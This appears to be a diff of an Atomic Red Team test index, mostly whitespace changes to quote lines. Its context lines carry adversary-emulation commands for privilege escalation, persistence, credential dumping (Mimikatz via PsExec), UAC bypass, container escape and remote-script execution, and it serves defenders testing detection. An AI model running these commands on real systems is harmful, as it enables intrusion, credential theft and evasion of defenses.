@@ -11357,7 +11357,7 @@ privilege-escalation: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. - ' +' supported_platforms: - macos - linux @@ -11377,7 +11377,7 @@ privilege-escalation: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil - ' +' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -11385,7 +11385,7 @@ privilege-escalation: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - macos - linux @@ -11417,7 +11417,7 @@ privilege-escalation: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: @@ -11434,10 +11434,10 @@ privilege-escalation: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} - ' +' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} - ' +' T1574.001: technique: id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 @@ -11612,10 +11612,10 @@ privilege-escalation: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) - ' +' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -11623,7 +11623,7 @@ privilege-escalation: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 - ' +' name: command_prompt T1078.001: technique: 
@@ -11735,16 +11735,16 @@ privilege-escalation: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default - ' +' supported_platforms: - windows executor: command: 'net user guest /active:yes - ' +' cleanup_command: 'net user guest /active:no - ' +' name: command_prompt elevation_required: true T1078.002: @@ -12185,21 +12185,21 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' - ' +' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload - ' +' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD @@ -12224,18 +12224,18 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls - ' +' name: bash T1055.001: technique: @@ -12335,10 +12335,10 @@ privilege-escalation: dependencies: - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" 
@@ -12484,7 +12484,7 @@ privilege-escalation: description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 - ' +' supported_platforms: - macos input_arguments: @@ -12582,24 +12582,24 @@ privilege-escalation: - description: Verify docker is installed. prereq_command: 'which docker - ' +' get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi - ' +' - description: Verify docker service is running. prereq_command: 'sudo systemctl status docker - ' +' get_prereq_command: 'sudo systemctl start docker - ' +' - description: Verify kind is in the path. prereq_command: 'which kind - ' +' get_prereq_command: | curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 chmod +x ./kind @@ -12607,14 +12607,14 @@ privilege-escalation: - description: Verify kind-atomic-cluster is created prereq_command: 'sudo kind get clusters - ' +' get_prereq_command: 'sudo kind create cluster --name atomic-cluster - ' +' - description: Verify kubectl is in path prereq_command: 'which kubectl - ' +' get_prereq_command: | curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" chmod +x ./kubectl @@ -12625,11 +12625,11 @@ privilege-escalation: true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}'' - ' +' name: sh cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-escape-pod - ' +' T1546: technique: id: attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db 
@@ -13173,7 +13173,7 @@ privilege-escalation: auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: @@ -13189,19 +13189,19 @@ privilege-escalation: command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" - ' +' cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: IFEO Global Flags auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: @@ -13337,7 +13337,7 @@ privilege-escalation: description: 'This test uses the insmod command to load a kernel module for Linux. - ' +' supported_platforms: - linux input_arguments: @@ -13361,10 +13361,10 @@ privilege-escalation: dependencies: - description: 'The kernel module must exist on disk at specified location - ' +' prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{module_source_path}/* #{temp_folder}/ @@ -13373,7 +13373,7 @@ privilege-escalation: executor: command: 'sudo insmod #{module_path} - ' +' cleanup_command: | sudo rmmod #{module_name} [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} @@ -13579,7 +13579,7 @@ privilege-escalation: auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 description: 'Create a plist and execute it - ' +' supported_platforms: - macos input_arguments: 
@@ -13596,15 +13596,15 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) - ' +' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; exit 1; - ' +' executor: name: bash elevation_required: true @@ -13698,7 +13698,7 @@ privilege-escalation: auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf description: 'Utilize LaunchDaemon to launch `Hello World` - ' +' supported_platforms: - macos input_arguments: @@ -13715,15 +13715,15 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) - ' +' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and try again."; exit 1; - ' +' executor: name: bash elevation_required: true @@ -13943,7 +13943,7 @@ privilege-escalation: auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 description: 'Mac logon script - ' +' supported_platforms: - macos executor: @@ -14141,7 +14141,7 @@ privilege-escalation: description: 'Netsh interacts with other operating system components using dynamic-link library (DLL) files - ' +' supported_platforms: - windows input_arguments: @@ -14152,7 +14152,7 @@ privilege-escalation: executor: command: 'netsh.exe add helper #{helper_file} - ' +' name: command_prompt T1037.003: technique: 
@@ -14314,10 +14314,10 @@ privilege-escalation: dependencies: - description: 'DLL to inject must exist on disk at specified location (#{dll_path}) - ' +' prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" @@ -14358,7 +14358,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}'' -ParentId #{parent_pid}' @@ -14387,7 +14387,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}' @@ -14417,7 +14417,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | @@ -14453,7 +14453,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}''' @@ -14863,7 +14863,7 @@ privilege-escalation: auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 description: 'Modify MacOS plist file in one of two directories - ' +' supported_platforms: - macos executor: 
@@ -14964,10 +14964,10 @@ privilege-escalation: command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ - ' +' cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" - ' +' name: command_prompt elevation_required: true T1055.002: @@ -15115,7 +15115,7 @@ privilege-escalation: profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. - ' +' supported_platforms: - windows input_arguments: @@ -15131,13 +15131,13 @@ privilege-escalation: dependencies: - description: 'Ensure a powershell profile exists for the current user - ' +' prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force - ' +' executor: command: | Add-Content #{ps_profile} -Value "" @@ -15484,13 +15484,13 @@ privilege-escalation: cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore - ' +' name: powershell - name: RunPE via VBA auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b description: 'This module executes notepad.exe from within the WINWORD.EXE process - ' +' supported_platforms: - windows input_arguments: @@ -15502,7 +15502,7 @@ privilege-escalation: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -15513,7 +15513,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" 
@@ -15636,7 +15636,7 @@ privilege-escalation: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed - ' +' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -15647,7 +15647,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -15682,7 +15682,7 @@ privilege-escalation: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -15696,10 +15696,10 @@ privilege-escalation: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) - ' +' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" @@ -15710,7 +15710,7 @@ privilege-escalation: command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit" - ' +' name: command_prompt elevation_required: false T1055.008: @@ -15887,14 +15887,14 @@ privilege-escalation: command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello World"'' >> /etc/rc.common - ' +' elevation_required: true name: bash - name: rc.common auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a description: 'Modify rc.common - ' +' supported_platforms: - linux executor: 
@@ -15910,12 +15910,12 @@ privilege-escalation: ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi - ' +' - name: rc.local auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 description: 'Modify rc.local - ' +' supported_platforms: - linux executor: @@ -15931,7 +15931,7 @@ privilege-escalation: ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi - ' +' T1547.007: technique: created: '2020-01-24T18:15:06.641Z' @@ -16013,10 +16013,10 @@ privilege-escalation: executor: command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} - ' +' cleanup_command: 'sudo defaults delete com.apple.loginwindow LoginHook - ' +' elevation_required: true name: sh T1547.001: @@ -16142,11 +16142,11 @@ privilege-escalation: command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" - ' +' cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1 - ' +' name: command_prompt - name: Reg Key RunOnce auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb @@ -16164,11 +16164,11 @@ privilege-escalation: command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" - ' +' cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: PowerShell Registry RunOnce @@ -16194,7 +16194,7 @@ privilege-escalation: cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Suspicious vbs file run from startup Folder 
@@ -16435,7 +16435,7 @@ privilege-escalation: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. - ' +' supported_platforms: - windows input_arguments: @@ -16452,10 +16452,10 @@ privilege-escalation: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 - ' +' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -16491,11 +16491,11 @@ privilege-escalation: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 - ' +' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | @@ -16517,7 +16517,7 @@ privilege-escalation: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 - ' +' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -16534,7 +16534,7 @@ privilege-escalation: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -16545,7 +16545,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" 
@@ -16558,7 +16558,7 @@ privilege-escalation: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. - ' +' supported_platforms: - windows executor: @@ -16570,7 +16570,7 @@ privilege-escalation: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 - ' +' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -16706,7 +16706,7 @@ privilege-escalation: sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. - ' +' supported_platforms: - windows input_arguments: @@ -16963,7 +16963,7 @@ privilege-escalation: description: 'Change Service registry ImagePath of a bengin service to a malicious file - ' +' supported_platforms: - windows input_arguments: @@ -16983,22 +16983,22 @@ privilege-escalation: dependencies: - description: 'The service must exist (#{weak_service_name}) - ' +' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" - ' +' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" - ' +' cleanup_command: 'sc.exe delete #{weak_service_name} - ' +' name: command_prompt T1548.001: technique: @@ -17054,7 +17054,7 @@ privilege-escalation: description: 'Make, change owner, and change file attributes on a C source code file - ' +' supported_platforms: - macos - linux @@ -17080,7 +17080,7 @@ privilege-escalation: auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 description: 'This test sets the SetUID flag on a file in Linux and macOS. - ' +' supported_platforms: - macos - linux 
@@ -17096,14 +17096,14 @@ privilege-escalation: sudo chmod u+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} - ' +' name: sh elevation_required: true - name: Set a SetGID flag on file auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c description: 'This test sets the SetGID flag on a file in Linux and macOS. - ' +' supported_platforms: - macos - linux @@ -17119,7 +17119,7 @@ privilege-escalation: sudo chmod g+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} - ' +' name: sh elevation_required: true T1547.009: @@ -17193,7 +17193,7 @@ privilege-escalation: #{shortcut_file_path} cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 - ' +' name: command_prompt - name: Create shortcut to cmd in startup folders auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 @@ -17294,10 +17294,10 @@ privilege-escalation: executor: command: 'sudo touch /Library/StartupItems/EvilStartup.plist - ' +' cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist - ' +' name: sh elevation_required: true T1548.003: @@ -17365,7 +17365,7 @@ privilege-escalation: auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e description: 'Common Sudo enumeration methods. - ' +' supported_platforms: - macos - linux @@ -17379,7 +17379,7 @@ privilege-escalation: This is dangerous to modify without using ''visudo'', do not do this on a production system. - ' +' supported_platforms: - macos - linux @@ -17394,7 +17394,7 @@ privilege-escalation: description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using ''visudo'', do not do this on a production system. - ' +' supported_platforms: - macos - linux @@ -17500,7 +17500,7 @@ privilege-escalation: description: 'This test creates a Systemd service unit file and enables it as a service. - ' +' supported_platforms: - linux input_arguments: 
@@ -17573,15 +17573,15 @@ privilege-escalation: dependencies: - description: 'System must be Ubuntu ,Kali OR CentOS. - ' +' prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi; - ' +' get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS. - ' +' executor: name: bash elevation_required: true @@ -18188,7 +18188,7 @@ privilege-escalation: auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f description: 'Adds a command to the .bash_profile file of the current user - ' +' supported_platforms: - macos - linux @@ -18200,13 +18200,13 @@ privilege-escalation: executor: command: 'echo "#{command_to_add}" >> ~/.bash_profile - ' +' name: sh - name: Add command to .bashrc auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f description: 'Adds a command to the .bashrc file of the current user - ' +' supported_platforms: - macos - linux @@ -18218,7 +18218,7 @@ privilege-escalation: executor: command: 'echo "#{command_to_add}" >> ~/.bashrc - ' +' name: sh T1055.014: technique: @@ -18653,10 +18653,10 @@ privilege-escalation: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) - ' +' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" 
@@ -18689,10 +18689,10 @@ privilege-escalation: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) - ' +' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -18788,11 +18788,11 @@ privilege-escalation: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force - ' +' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore - ' +' name: powershell - name: Winlogon Userinit Key Persistence - PowerShell auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb @@ -18811,11 +18811,11 @@ privilege-escalation: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force - ' +' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore - ' +' name: powershell - name: Winlogon Notify Key Logon Persistence - PowerShell auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 @@ -18837,7 +18837,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore - ' +' name: powershell T1547.013: technique: @@ -19331,10 +19331,10 @@ defense-evasion: command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} - ' +' cleanup_command: 'del #{local_file} >nul 2>&1 - ' +' name: command_prompt - name: Bitsadmin Download (PowerShell) auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc 
@@ -19358,10 +19358,10 @@ defense-evasion: command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} - ' +' cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore - ' +' name: powershell - name: Persist, Download, & Execute auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae @@ -19399,7 +19399,7 @@ defense-evasion: bitsadmin.exe /complete #{bits_job_name} cleanup_command: 'del #{local_file} >nul 2>&1 - ' +' name: command_prompt - name: Bits download using desktopimgdownldr.exe (cmd) auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 @@ -19431,10 +19431,10 @@ defense-evasion: command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr - ' +' cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >null 2>&1 - ' +' name: command_prompt T1027.001: technique: @@ -19524,20 +19524,20 @@ defense-evasion: dependencies: - description: 'The binary must exist on disk at specified location (#{file_to_pad}) - ' +' prereq_command: 'if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'cp /bin/ls #{file_to_pad} - ' +' executor: command: 'dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} - ' +' cleanup_command: 'rm #{file_to_pad} - ' +' name: sh T1542.003: technique: @@ -19770,7 +19770,7 @@ defense-evasion: cmd.exe /c eventvwr.msc cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1 - ' +' name: command_prompt - name: Bypass UAC using Event Viewer (PowerShell) auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b @@ -19792,7 +19792,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore - ' +' name: powershell - name: Bypass UAC using Fodhelper auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 
@@ -19814,7 +19814,7 @@ defense-evasion: cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1 - ' +' name: command_prompt - name: Bypass UAC using Fodhelper - PowerShell auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa @@ -19837,7 +19837,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore - ' +' name: powershell - name: Bypass UAC using ComputerDefaults (PowerShell) auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f @@ -19860,7 +19860,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Bypass UAC by Mocking Trusted Directories @@ -19908,7 +19908,7 @@ defense-evasion: cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore - ' +' name: powershell - name: Disable UAC using reg.exe auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 @@ -19921,11 +19921,11 @@ defense-evasion: command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f - ' +' cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f - ' +' name: command_prompt elevation_required: true - name: Bypass UAC using SilentCleanup task @@ -20030,7 +20030,7 @@ defense-evasion: description: 'Adversaries may supply CMSTP.exe with INF files infected with malicious commands - ' +' supported_platforms: - windows input_arguments: 
@@ -20042,24 +20042,24 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_file_path}) - ' +' prereq_command: 'if (Test-Path #{inf_file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T218.003.inf" -OutFile "#{inf_file_path}" executor: command: 'cmstp.exe /s #{inf_file_path} - ' +' name: command_prompt - name: CMSTP Executing UAC Bypass auto_generated_guid: 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 description: 'Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file - ' +' supported_platforms: - windows input_arguments: @@ -20071,17 +20071,17 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_file_uac}) - ' +' prereq_command: 'if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_file_uac}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf" -OutFile "#{inf_file_uac}" executor: command: 'cmstp.exe /s #{inf_file_uac} /au - ' +' name: command_prompt T1574.012: technique: @@ -20192,7 +20192,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" 
